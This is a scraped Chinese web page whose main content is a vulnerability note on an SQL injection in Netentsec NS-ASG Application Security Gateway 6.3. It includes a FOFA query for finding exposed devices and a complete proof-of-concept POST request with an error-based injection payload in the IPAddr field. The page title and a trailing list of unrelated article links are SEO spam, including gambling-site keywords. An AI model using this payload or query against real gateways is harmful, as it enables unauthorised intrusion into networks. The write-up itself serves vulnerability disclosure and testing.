当前位置: 首页 > news >正文

菠菜网站开发软件企业网站建设栏目结构图

菠菜网站开发,软件企业网站建设栏目结构图,企业注册视频号,关于未备案网站0x01 产品简介 网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品,集成了SSL和 IPSecQ,旨在保障业务访问的安全性,适配所有移动终端,提供多种链路均衡和选择技术,支持多种认证方式灵活组合,以及内置短…

0x01 产品简介

网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品,集成了SSL和 IPSecQ,旨在保障业务访问的安全性,适配所有移动终端,提供多种链路均衡和选择技术,支持多种认证方式灵活组合,以及内置短信认证、LDAP令牌、USB KEY等多达13种认证方式。

0x02 漏洞概述

Netentsec NS-ASG Application Security Gateway 6.3中发现了一个漏洞,被分类为危急级别。这影响了文件/protocol/index.php的一个未知部分。对参数IPAddr的操作导致了SQL注入。攻击者可以远程发起攻击。

0x03 测绘语句

fofa:title="网康-NS-ASG-应用安全网关"

0x04 漏洞复现

POST /protocol/index.php HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencodedjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,md5(1),0x7e),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

0x05 影响范围

Netentsec NS-ASG Application Security Gateway 6.3

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

http://www.yayakq.cn/news/465848/

相关文章:

  • 电子商务网站建设体会wordpress 双语网站
  • 职业中学网站建设html制作企业宣传网站
  • seo 能提高网站速度吗华铭保信建筑公司网站
  • 中山微信网站短视频营销名词解释
  • 高端做网站价格建设户外腰包网站
  • 泉州建设部网站网站主页设计优点
  • 化妆品公司网站建设方案大连公司名称大全
  • 旅游网站的系统建设的意义seo权重查询
  • 医药加盟网站模板重庆建设工程信息网址
  • 烟台中企动力提供网站建设wordpress 豆瓣 主题
  • 专业网站建设公司哪家专业论坛网站如何建设
  • 无锡做公司网站多少钱怎么做新网站才能被百度收录
  • 备案的网站 ,能拿来做仿站吗关键词推广名词解释
  • 企业网站制作查询seo入门基础知识
  • 成都网站建设十强企业做网站三河
  • 淄博市网站云平台最好的cms开源
  • 焦作市网站建设哪家好php做网站切换语言
  • 网站如何分页全flash网站制作教程
  • html购物网站模板下载seo优化必备技巧
  • 网站建设中存在的问题高端科技网站建设
  • 做化学题的网站wordpress 函数大全
  • 用nodejs做的网站泉州网站建设怎么收费
  • 政务公开 加强门户网站建设seo网络推广专员招聘
  • 连锁酒店网站建设互联网培训机构哪个好
  • 网站定制开发与模版自己电脑做网站模板
  • 网站 服务器 虚拟主机深圳深网站建设服务
  • app网站制作下载wordpress文章批量模版
  • 乔智云智能建站如何去除痘痘有效果
  • 做国外搞笑网站可以免费做3dLOGO的网站
  • 北京南站是中高风险地区吗丽水集团网站建设